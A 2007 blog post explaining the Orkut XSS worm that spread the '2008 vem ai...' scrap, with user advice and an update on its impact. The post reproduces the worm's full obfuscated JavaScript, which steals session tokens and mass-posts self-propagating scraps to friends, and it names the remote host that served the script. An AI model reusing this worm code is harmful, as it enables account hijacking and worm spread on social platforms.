Microsoft Anti Virus

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Tuesday, 18 December 2007

Orkut XSS attack - that "2008 vem ai... que ele comece mto bem para vc" thingie

Posted on 20:04 by Unknown


Orkut XSS Attack - "2008 vem ai... que ele comece mto bem para vc" thing





A lot of you have probably been wondering how you received a scrap saying " 2008 vem ai... que ele comece mto bem para vc" from me or possibly from some friend of yours.



Its called xss attack or cross site scripting attack. A piece of javascript code(on clients side that is your browser) gets executed, when you receive a scrap from your friends id(obviously after his orkut session is infected with the malicious code) with the spam message and started scrapping everyone. This happens when you log into your orkut scrapbook to read the malicious scrap.

When someone sends you a spam scrap and you read that the same scrap is sent to your friends from your account. This will spread for the coming few days possibly till orkut takes some measures.

Steps you can take:

If possible change your gmail account password and do not login to orkut till they sort this out.



Courtesy: Antrix.net(find link in comments)

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {

e=function(c) {

   return(c35?String.fromCharCode(c+29):c.toString(36))

};

if(!''.replace(/^/,String)){

   while(c--){d[e(c)]=k[c]||e(c)}

   k=[function(e){return d[e]}];

   e=function(){return'\\w+'};

   c=1

};

while(c--){

   if(k[c]){

       p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])

   }

}

return p

};

setTimeout(

$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}

L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};

7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+

(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");

8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1)

{h=l.S(A);6(h!=0){b 2h}}16{h+=2};

5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};

7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")

+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};

7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7()

{6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");

t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0))

;f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};

3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();

3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);

3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);

3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};

7 V(){6(j==8.18("N").M){b};

5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>

[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\'); r.1o=" 1c="\\" 1e="\\">";

5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();

3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");

3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};

6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();

',62,150,'|||xml||var|if|function|document|domain|send|

return|path|wDate||select|name|begin|new|index|

www|dc|expires|encodeURIComponent|http|com|POST|script|

wormdoorkut|div|end|getCookie|orkut||cookie|aspx

|prefix|createXMLHttpRequest|true|getElementsByTagName|S

IG|Date|loadFriends|POST_TOKEN|scrapText|null|

signature|catch|length|selectedList|item|value|application|

open|indexOf|cmm_join|secure|sendScrap|setCookie|

readyState|onreadystatechange|try|Content|86400

|setRequestHeader|embed|ActiveXObject|Action|else|form|

getElementById|escape|status|urlencoded|200|setTime

|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|

createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|

GMT|go|GET|Compose|width|innerHTML|height|option|

setAttribute|id|submit|style|display|none|removeChild

|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|

history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|

raw|LoL|Msxml2|type|Microsoft|shockwave|flash|

wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera

|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1

);

author="Rodrigo Lacerda"



The orkut website is built on asp.net,

if you wish to read the technical side

of preventing xss attacks in asp.net go here 



Update:

1.) The problem seems to have sorted out by orkut in

2 days(thats long)

2.) 400,000 users affected.

3.) Top users affected by country

US, Germany, India, Brazil

4.) Orkut has still not accepted it was

a mistake from their side.The official orkut blog

is still mum on the incidence.

5.) Your password is safe, though it was possible

to hack your gmail password if say the virus

redirected to you to a page which looked

exactly like orkut and asked you to relogin.



A

Read More
Posted in Google, Internet, Observations, Rumours | No comments
Newer Posts Older Posts Home
Subscribe to: Posts (Atom)

Popular Posts

  • Google Reveals How Much Percentage Of Revenue It Shares With Adsense Publishers
    Google recently revealed on a blog post on its adsense blog, what percentage of revenue it shares with its adsense partners. According to th...
  • FutureVision: Ni Hao, Welcome to Moon, This is year 2050 and this is Moon, Republic of China
    While i was on the topic of China, i just cldn't help mention that China has had a successul mission to space . They also plan a manned ...
  • Long story short!
    A little bird was flying in winter. The bird froze and fell to ground. A cow came and dropped some dung on it. Bird began to realise how war...
  • Nokia switches strategy, connects to internet
       Nokia whos brand slogan is connecting people, has so far not connected to the internet too much. They were happy making cool phones and s...
  • Making Internet Banking More Secure
    Recently someone tried to reset my net banking password. I called the bank but they were not even aware of it. They told me they would check...
  • 1 - 2 - 3
    1 - 2 - 3 are special numbers. For some reason in every sport, the first 3 people are awarded a medal.  Ofcourse 1 is the best place to be t...
  • Marissa Mayer Says Sorry On Google's "This Site May Harm You" Issue
    Marissa Mayer, Googles, cute(plus hot) but smart VP, Search products and user experience said sorry in a blogpost titled "This site ma...
  • Conficker Worm Removal: If You Cannot Open Anti Virus Sites & Microsoft Sites
    Conficker Worm changes your host file (if you don't know what it is, don't worry or search Google) in a way that you cannot visit an...
  • The flight that fought back
    I was watching discoverys best shows and they had a series on 9/11 named the flight that fought back. It's about the last plane that lan...
  • When Should Technology "Must" Be Free/Open Source/Open Standard?
    I have pondered about this questions a lot, for years maybe & still i don't really know the answer. Technology business is so full o...

Categories

  • Anthropology
  • Blogging
  • Blogs
  • Business
  • Economics
  • Finance
  • Fun
  • Future
  • Google
  • GTD
  • Humor
  • Inspiration
  • Internet
  • News
  • Observations
  • Online Advertising
  • Personal Development
  • Politics
  • Pop Culture
  • Productivity
  • Research
  • Rumours
  • Self Growth
  • Sports
  • Technology News
  • Weird Stuff

Blog Archive

  • ►  2010 (1)
    • ►  May (1)
  • ►  2009 (14)
    • ►  July (1)
    • ►  June (8)
    • ►  February (1)
    • ►  January (4)
  • ►  2008 (38)
    • ►  November (3)
    • ►  October (26)
    • ►  September (6)
    • ►  May (2)
    • ►  March (1)
  • ▼  2007 (5)
    • ▼  December (1)
      • Orkut XSS attack - that "2008 vem ai... que ele co...
    • ►  October (2)
    • ►  May (1)
    • ►  April (1)
  • ►  2005 (10)
    • ►  December (1)
    • ►  October (3)
    • ►  September (6)
Powered by Blogger.

About Me

Unknown
View my complete profile